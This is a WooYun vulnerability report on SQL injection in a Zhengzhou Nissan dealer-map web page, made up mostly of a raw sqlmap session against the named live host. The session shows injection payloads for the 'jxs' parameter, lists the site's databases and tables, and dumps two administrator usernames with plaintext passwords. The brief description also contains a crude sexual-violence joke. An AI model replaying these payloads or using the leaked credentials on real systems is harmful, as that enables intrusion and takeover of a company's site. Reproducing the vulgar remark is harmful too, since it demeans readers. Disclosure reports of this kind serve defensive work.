郑州日产汽车有限公司存在大量的sql注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155681

漏洞标题：郑州日产汽车有限公司存在大量的sql注入

漏洞作者： SunnyDoll

提交时间：2015-11-25 09:58

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商已经确认，细节仅向厂商公开
2015-12-05：细节向核心白帽子及相关领域专家公开
2015-12-15：细节向普通白帽子公开
2015-12-25：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

日遍天下.轮奸你.
(PS：我想知道程序猿们外出泡妞去了吗？)

详细说明：

root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:31:27
[22:31:28] [INFO] testing connection to the target URL
[22:31:28] [INFO] testing if the target URL is stable
[22:31:29] [INFO] target URL is stable
[22:31:29] [INFO] testing if GET parameter 'jxs' is dynamic
[22:31:29] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:31:29] [INFO] GET parameter 'jxs' is dynamic
[22:31:30] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:31:30] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:31:30] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:31:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:31:34] [WARNING] reflective value(s) found and filtering out
[22:31:35] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:31:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:31:36] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:31:36] [INFO] testing 'MySQL inline queries'
[22:31:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:31:36] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:31:46] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:31:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:31:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:31:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:31:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:31:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:31:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:31:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:31:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:32:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:32:20] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:32:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:32:31] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:32:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:32:41] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:32:54] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:27] [CRITICAL] unable to connect to the target URL or proxy
[22:33:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:34:10] [CRITICAL] unable to connect to the target URL or proxy
[22:34:10] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:34:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:34:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:34:11] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:34:13] [INFO] target URL appears to have 17 columns in query
[22:34:15] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:34:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:34:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:34:51
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:34:55
[22:34:55] [INFO] resuming back-end DBMS 'mysql' 
[22:34:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:34:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:34:56] [INFO] fetching database names
[22:34:56] [INFO] the SQL query used returns 41 entries
[22:34:56] [INFO] retrieved: information_schema
[22:34:57] [INFO] retrieved: club_15
[22:34:57] [INFO] retrieved: ebuy
[22:34:57] [INFO] retrieved: ebuy1217
[22:34:58] [INFO] retrieved: events
[22:34:58] [INFO] retrieved: events_2014cgr
[22:34:58] [INFO] retrieved: events_2014five
[22:34:58] [INFO] retrieved: events_pickupStory
[22:34:59] [INFO] retrieved: ezznissan
[22:34:59] [INFO] retrieved: innodb
[22:34:59] [INFO] retrieved: jinzhiwen
[22:35:00] [INFO] retrieved: maintain
[22:35:05] [INFO] retrieved: mysql
[22:35:05] [INFO] retrieved: nissan
[22:35:06] [INFO] retrieved: nissan_2015cgr
[22:35:06] [INFO] retrieved: nissan_jxs
[22:35:06] [INFO] retrieved: nissan_patrol
[22:35:06] [INFO] retrieved: nissanmedia
[22:35:07] [INFO] retrieved: nissantest
[22:35:07] [INFO] retrieved: paladin
[22:35:13] [INFO] retrieved: paladinclub
[22:35:13] [INFO] retrieved: paladinclubtemp
[22:35:18] [INFO] retrieved: palaqi
[22:35:19] [INFO] retrieved: performance_schema
[22:35:19] [INFO] retrieved: specialcar
[22:35:20] [INFO] retrieved: test
[22:35:20] [INFO] retrieved: topic
[22:35:25] [INFO] retrieved: tower_15
[22:35:26] [INFO] retrieved: wqw_five
[22:35:26] [INFO] retrieved: wqw_mx6gc
[22:35:26] [INFO] retrieved: wqw_succk
[22:35:27] [INFO] retrieved: xuhui
[22:35:27] [INFO] retrieved: yaguan
[22:35:28] [INFO] retrieved: zznissan
[22:35:28] [INFO] retrieved: zznissan_eng
[22:35:29] [INFO] retrieved: zznissan_jnds
[22:35:29] [INFO] retrieved: zznissan_lms2015
[22:35:29] [INFO] retrieved: zznissan_mx6sj2015
[22:35:29] [INFO] retrieved: zznissan_mx6tg2015
[22:35:30] [INFO] retrieved: zznissan_pro
[22:35:30] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:35:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:35:30
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:38:53
[22:38:53] [INFO] resuming back-end DBMS 'mysql' 
[22:38:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:38:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:38:54] [INFO] fetching current database
current database:    'zznissan'
[22:38:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:38:54
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --tables -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:39:07
[22:39:07] [INFO] resuming back-end DBMS 'mysql' 
[22:39:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:39:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:39:08] [INFO] fetching tables for database: 'zznissan'
[22:39:09] [INFO] the SQL query used returns 78 entries
[22:39:09] [INFO] retrieved: Recruitment
[22:39:14] [INFO] retrieved: act_article
[22:39:15] [INFO] retrieved: act_category
[22:39:15] [INFO] retrieved: article
[22:39:15] [INFO] retrieved: article1029
[22:39:16] [INFO] retrieved: brandpicture
[22:39:21] [INFO] retrieved: car_adimg
[22:39:21] [INFO] retrieved: car_brand
[22:39:21] [INFO] retrieved: car_carimg
[22:39:22] [INFO] retrieved: car_config
[22:39:27] [INFO] retrieved: car_detail
[22:39:27] [INFO] retrieved: car_drive
[22:39:28] [INFO] retrieved: car_drivehouse
[22:39:28] [INFO] retrieved: car_getinfo
[22:39:28] [INFO] retrieved: car_leixing
[22:39:29] [INFO] retrieved: car_models
[22:39:34] [INFO] retrieved: car_modelsinfo
[22:39:34] [INFO] retrieved: car_norms
[22:39:34] [INFO] retrieved: car_parameter
[22:39:35] [INFO] retrieved: car_seat
[22:39:35] [INFO] retrieved: car_series
[22:39:35] [INFO] retrieved: car_seriesinfo
[22:39:35] [INFO] retrieved: car_spec
[22:39:36] [INFO] retrieved: car_speed
[22:39:36] [INFO] retrieved: car_standard
[22:39:36] [INFO] retrieved: car_structure
[22:39:37] [INFO] retrieved: car_user
[22:39:42] [INFO] retrieved: car_userfun
[22:39:43] [INFO] retrieved: car_usergroup
[22:39:43] [INFO] retrieved: car_view
[22:39:43] [INFO] retrieved: category
[22:39:44] [INFO] retrieved: department
[22:39:44] [INFO] retrieved: displacement
[22:39:44] [INFO] retrieved: downcategory
[22:39:45] [INFO] retrieved: download
[22:39:45] [INFO] retrieved: dqcategory
[22:39:45] [INFO] retrieved: ecatalog
[22:39:46] [INFO] retrieved: energy_config
[22:39:46] [INFO] retrieved: energy_detail
[22:39:46] [INFO] retrieved: energy_images
[22:39:47] [INFO] retrieved: energy_memory
[22:39:47] [INFO] retrieved: energy_notice
[22:39:47] [INFO] retrieved: energy_parameter
[22:39:48] [INFO] retrieved: energy_picture
[22:39:48] [INFO] retrieved: energy_series
[22:39:48] [INFO] retrieved: energy_seriesinfo
[22:39:49] [INFO] retrieved: energy_video
[22:39:49] [INFO] retrieved: energy_view
[22:39:49] [INFO] retrieved: feedback
[22:39:49] [INFO] retrieved: get_active
[22:39:50] [INFO] retrieved: imagefile
[22:39:50] [INFO] retrieved: imgcategory
[22:39:51] [INFO] retrieved: jxs_getinfo
[22:39:51] [INFO] retrieved: login_record
[22:39:52] [INFO] retrieved: memory
[22:39:52] [INFO] retrieved: mobilepicture
[22:39:52] [INFO] retrieved: mx6_dealer
[22:39:53] [INFO] retrieved: mx6_testdrive
[22:39:53] [INFO] retrieved: mx6_user
[22:39:53] [INFO] retrieved: picture
[22:39:53] [INFO] retrieved: price
[22:39:54] [INFO] retrieved: purecategory
[22:39:54] [INFO] retrieved: puregoods
[22:40:00] [INFO] retrieved: rencai
[22:40:00] [INFO] retrieved: service
[22:40:00] [INFO] retrieved: service_bak
[22:40:01] [INFO] retrieved: sessions
[22:40:01] [INFO] retrieved: survey
[22:40:02] [INFO] retrieved: telents
[22:40:02] [INFO] retrieved: topic
[22:40:02] [INFO] retrieved: user
[22:40:03] [INFO] retrieved: userfun
[22:40:03] [INFO] retrieved: usergroup
[22:40:03] [INFO] retrieved: view_Carprice
[22:40:03] [INFO] retrieved: view_models
[22:40:04] [INFO] retrieved: view_models_test
[22:40:04] [INFO] retrieved: view_parameter
[22:40:04] [INFO] retrieved: zhaopin
Database: zznissan                                                             
[78 tables]
+-------------------+
| Recruitment       |
| user              |
| act_article       |
| act_category      |
| article           |
| article1029       |
| brandpicture      |
| car_adimg         |
| car_brand         |
| car_carimg        |
| car_config        |
| car_detail        |
| car_drive         |
| car_drivehouse    |
| car_getinfo       |
| car_leixing       |
| car_models        |
| car_modelsinfo    |
| car_norms         |
| car_parameter     |
| car_seat          |
| car_series        |
| car_seriesinfo    |
| car_spec          |
| car_speed         |
| car_standard      |
| car_structure     |
| car_user          |
| car_userfun       |
| car_usergroup     |
| car_view          |
| category          |
| department        |
| displacement      |
| downcategory      |
| download          |
| dqcategory        |
| ecatalog          |
| energy_config     |
| energy_detail     |
| energy_images     |
| energy_memory     |
| energy_notice     |
| energy_parameter  |
| energy_picture    |
| energy_series     |
| energy_seriesinfo |
| energy_video      |
| energy_view       |
| feedback          |
| get_active        |
| imagefile         |
| imgcategory       |
| jxs_getinfo       |
| login_record      |
| memory            |
| mobilepicture     |
| mx6_dealer        |
| mx6_testdrive     |
| mx6_user          |
| picture           |
| price             |
| purecategory      |
| puregoods         |
| rencai            |
| service           |
| service_bak       |
| sessions          |
| survey            |
| telents           |
| topic             |
| userfun           |
| usergroup         |
| view_Carprice     |
| view_models       |
| view_models_test  |
| view_parameter    |
| zhaopin           |
+-------------------+
[22:40:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:40:04
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --columns -T user -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:40:59
[22:40:59] [INFO] resuming back-end DBMS 'mysql' 
[22:40:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:41:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:41:00] [INFO] fetching columns for table 'user' in database 'zznissan'
[22:41:01] [INFO] the SQL query used returns 19 entries
[22:41:01] [INFO] retrieved: "id","tinyint(5)"
[22:41:01] [INFO] retrieved: "username","varchar(20)"
[22:41:02] [INFO] retrieved: "password","varchar(32)"
[22:41:02] [INFO] retrieved: "groupid","tinyint(2)"
[22:41:03] [INFO] retrieved: "depid","tinyint(2)"
[22:41:03] [INFO] retrieved: "userEmail","varchar(50)"
[22:41:03] [INFO] retrieved: "addCount","int(10) unsigned"
[22:41:04] [INFO] retrieved: "ip","varchar(255)"
[22:41:04] [INFO] retrieved: "addtime","datetime"
[22:41:04] [INFO] retrieved: "operator_id","int(11)"
[22:41:04] [INFO] retrieved: "user_dep_id","int(11)"
[22:41:04] [INFO] retrieved: "user_dep_name","varchar(255)"
[22:41:05] [INFO] retrieved: "user_deprights","text"
[22:41:06] [INFO] retrieved: "realname","varchar(255)"
[22:41:06] [INFO] retrieved: "keyno","varchar(25)"
[22:41:06] [INFO] retrieved: "keypin","varchar(255)"
[22:41:07] [INFO] retrieved: "usekey","tinyint(1)"
[22:41:07] [INFO] retrieved: "jxs_uid","int(11)"
[22:41:07] [INFO] retrieved: "area_id","int(11)"
Database: zznissan                                                             
Table: user
[19 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| addCount       | int(10) unsigned |
| addtime        | datetime         |
| area_id        | int(11)          |
| depid          | tinyint(2)       |
| groupid        | tinyint(2)       |
| id             | tinyint(5)       |
| ip             | varchar(255)     |
| jxs_uid        | int(11)          |
| keyno          | varchar(25)      |
| keypin         | varchar(255)     |
| operator_id    | int(11)          |
| password       | varchar(32)      |
| realname       | varchar(255)     |
| usekey         | tinyint(1)       |
| user_dep_id    | int(11)          |
| user_dep_name  | varchar(255)     |
| user_deprights | text             |
| userEmail      | varchar(50)      |
| username       | varchar(20)      |
+----------------+------------------+
[22:41:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:41:07
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dump -T user -C "username,password" -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:42:16
[22:42:16] [INFO] resuming back-end DBMS 'mysql' 
[22:42:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:42:22] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:42:22] [INFO] fetching columns 'password, username' for table 'user' in database 'zznissan'
[22:42:22] [INFO] the SQL query used returns 2 entries
[22:42:22] [INFO] retrieved: "username","varchar(20)"
[22:42:23] [INFO] retrieved: "password","varchar(32)"
[22:42:23] [INFO] fetching entries of column(s) 'password, username' for table 'user' in database 'zznissan'
[22:42:23] [INFO] the SQL query used returns 2 entries
[22:42:28] [INFO] retrieved: "nissan2014!@#","super"
[22:42:34] [INFO] retrieved: "zznissan2015!@#$%^","admin"
[22:42:34] [INFO] analyzing table dump for possible password hashes            
Database: zznissan
Table: user
[2 entries]
+----------+--------------------+
| username | password           |
+----------+--------------------+
| super    | nissan2014!@#      |
| admin    | zznissan2015!@#$%^ |
+----------+--------------------+
[22:42:34] [WARNING] table 'zznissan.`user`' dumped to CSV file '/root/.sqlmap/output/hbjzmh.zznissan.com.cn/dump/zznissan/user-f3649c95.csv'
[22:42:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:42:34
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --columns -T car_user -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:43:17
[22:43:17] [INFO] resuming back-end DBMS 'mysql' 
[22:43:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:43:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:43:19] [INFO] fetching columns for table 'car_user' in database 'zznissan'
[22:43:20] [INFO] the SQL query used returns 19 entries
[22:43:21] [INFO] retrieved: "id","tinyint(5)"
[22:43:21] [INFO] retrieved: "username","varchar(20)"
[22:43:21] [INFO] retrieved: "password","varchar(32)"
[22:43:22] [INFO] retrieved: "groupid","tinyint(2)"
[22:43:22] [INFO] retrieved: "depid","tinyint(2)"
[22:43:27] [INFO] retrieved: "userEmail","varchar(50)"
[22:43:27] [INFO] retrieved: "addCount","int(10) unsigned"
[22:43:28] [INFO] retrieved: "ip","varchar(255)"
[22:43:28] [INFO] retrieved: "addtime","datetime"
[22:43:29] [INFO] retrieved: "operator_id","int(11)"
[22:43:29] [INFO] retrieved: "user_dep_id","int(11)"
[22:43:29] [INFO] retrieved: "user_dep_name","varchar(255)"
